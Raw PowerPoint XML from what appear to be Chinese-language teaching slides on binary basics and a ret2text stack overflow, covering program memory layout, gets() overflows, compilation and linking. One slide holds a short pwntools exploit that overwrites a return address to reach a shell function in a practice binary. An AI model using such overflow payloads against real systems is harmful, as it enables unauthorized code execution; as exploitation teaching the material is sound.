              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB87570-AA3A-41C6-9354-F57105467229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7271387" y="4335166"/>
            <a:ext cx="3883021" cy="33981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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA77EA5-89D3-4070-BA8F-BF1776AF1CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7271386" y="5612333"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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backdoor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in ELF</a:t>
            </a:r>
            <a:endParaRPr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E8DF81C6-7849-475A-BAB9-9D552070BB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| ret2text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115E1E8-CCC2-726C-146C-789DC10B95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629" y="399245"/>
            <a:ext cx="4656223" cy="1463167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132A736C-6F52-D28F-B8CF-5D2B910738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628" y="1777626"/>
            <a:ext cx="3383573" cy="1219306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F61CE935-FAA7-3213-2DE3-06CDFB5E3F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332" y="2971219"/>
            <a:ext cx="5631668" cy="3817951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48FFED28-DFC7-62AA-3BDB-8C0A30652E29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4664264" y="2967335"/>
            <a:ext cx="23343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程序中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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get_shell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函数调用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system(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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sh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”)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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80CE9FDD-AF0B-A156-88AE-9F0C620A8562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4664265" y="1856267"/>
            <a:ext cx="23343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gets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函数导致缓冲区溢出漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274134929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A93B0BAB-2F16-46A9-97CC-90D4C00E5091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6426558" y="399245"/>
            <a:ext cx="3883021" cy="6246254"/>
            <a:chOff x="4584879" y="992499"/>
            <a:chExt cx="5738969" cy="5601480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B9289E-73FE-49AF-B6F4-0900DF5D5FC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584879" y="992499"/>
              <a:ext cx="5738969" cy="5601480"/>
              <a:chOff x="4897550" y="888136"/>
              <a:chExt cx="1363200" cy="3620439"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B570F3-A096-4B70-BE99-92F5DB78D599}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2C601E-D1C3-428E-AEAC-1E25E4FDE7A8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1162336"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2417D00D-B973-4A6F-B7B9-5A3DDEB7F146}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A56EF6-4FB8-4E94-A5C1-50DF5761DCB0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{707381BE-9F57-472D-A9D6-4B032B784029}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B8DF59-E4C5-4FD2-A237-586D621D29B3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E931A1D2-481B-4BB9-891B-84E7E8BCFE3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3361338"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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Data</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9893FB29-F450-49FA-BC66-8C71333CB434}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3635538"/>
                <a:ext cx="1363200" cy="598837"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81F4E38F-7208-4D9C-B943-2280EFFD6742}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4234375"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B56582F-1891-49BA-9F55-08C133B125D1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18EAAC46-FCCD-4964-980A-AAFF78D1D986}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82D5E77-3B99-4ED7-9D49-E74A5C908844}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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backdoor_addr</a:t>
              </a:r>
              <a:endParaRPr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31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66390BC5-F328-44DF-B6AE-7DBFD4626842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10467614" y="1017485"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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22386C21-3C35-4D7A-8DE1-7548ACAA8C4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10555224" y="5471183"/>
            <a:ext cx="683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Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="连接符: 肘形 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D4EB105-A862-43D0-B8CE-5D59E5E670DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="1"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6426556" y="1489762"/>
            <a:ext cx="3" cy="4262596"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7620100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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Shape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB87570-AA3A-41C6-9354-F57105467229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6426556" y="4335166"/>
            <a:ext cx="3883021" cy="33981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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA77EA5-89D3-4070-BA8F-BF1776AF1CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6426555" y="5612333"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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backdoor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in ELF</a:t>
            </a:r>
            <a:endParaRPr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7D519EE-BF54-4641-887A-627D5353173E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1587424" y="2366658"/>
            <a:ext cx="306516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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pwn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import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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io = process("./ret2text")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.recv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()</a:t>
            </a:r>
          </a:p>
          <a:p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payload = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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b'A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'*16 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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b'B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'*4 + p32(0x8048522)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.sendline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(payload)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.interactive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()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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E8DF81C6-7849-475A-BAB9-9D552070BB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| ret2text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20847185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111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DCBC81-C36E-4A6A-839A-B657420011F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2374032"/>
            <a:ext cx="2554103" cy="325563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 Code (p1.c p2.c)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD4CB35-5293-4C26-9202-591B5C102BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3084132"/>
            <a:ext cx="2554103" cy="325563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Assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (p1.s p2.s)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFB2AE2D-7A72-40F8-B4C5-27B456BC0702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3794232"/>
            <a:ext cx="2554103" cy="325563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Object (p1.o p2.o)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722A2B5D-6B07-4BCD-ABD6-CA7AB0C7877F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4504344"/>
            <a:ext cx="2554103" cy="325563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Executable (p)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Shape 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B03AACC0-31F1-4AC3-9969-CE4BDA91D537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7373052" y="2699595"/>
            <a:ext cx="0" cy="38453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" name="Shape 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D9C2E90-2CC0-4A01-8F70-498B6D1FA41E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7373052" y="3409695"/>
            <a:ext cx="0" cy="38453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" name="Shape 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D42C06A-6F40-4A4D-8BC5-5B7F893C187E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7373052" y="4119795"/>
            <a:ext cx="0" cy="38454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3" name="Shape 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75E35F9E-277A-4362-AF8D-1EA75EB9DF28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7288350" y="2729082"/>
            <a:ext cx="2554103" cy="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compiler: gcc -S</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 119">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{599FCD4F-CB15-4937-AA68-7AEE0D275DEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7447775" y="3439182"/>
            <a:ext cx="2554103" cy="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assembler: gcc or as</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38AA1808-83D4-4307-A480-8514FA9EAC19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7288350" y="4149282"/>
            <a:ext cx="2554103" cy="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linker: gcc or ld</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05C1D9EE-96D5-4E11-8313-96A2737125A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9304900" y="3794232"/>
            <a:ext cx="2554103" cy="325563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Static Library (.a)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Shape 122">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{022E0D13-5A86-4295-A30F-47D821A87770}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8650103" y="4119795"/>
            <a:ext cx="1931849" cy="54733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" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE03D87-D78A-400E-AAB5-29FB96CD673E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332997" y="2228044"/>
            <a:ext cx="50064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从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源代码到可执行文件的生成过程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83E32506-F6CA-49ED-B74A-90582F20BFFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815753" y="2898770"/>
            <a:ext cx="404098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编译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由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语言代码生成汇编代码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汇编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由汇编代码生成机器码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链接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将多个机器码的目标文件链接成一个可执行文件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AE4950BD-2EDF-4D2A-8F6C-D75517729040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="588917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二进制基础 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程序的编译与链接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2133309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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6763447" y="602355"/>
            <a:ext cx="3883027" cy="5653289"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5069724"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
